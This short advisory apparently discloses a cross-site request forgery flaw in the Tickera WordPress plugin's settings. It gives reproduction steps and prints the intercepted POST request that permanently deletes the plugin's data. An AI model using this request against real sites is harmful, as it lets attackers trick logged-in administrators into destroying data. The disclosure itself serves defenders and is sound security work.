The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
1. Navigate to Tickera Settings ยป Delete info
2. Delete info request intercept like that
POST /wp-admin/edit.php?post_type=tc_events&page=tc_settings&tab=tickera_delete_info
tc_delete_plugin_data%5Btickera%5D=yes&tc_delete_selected_data_permanently=Delete+selected+data+permanently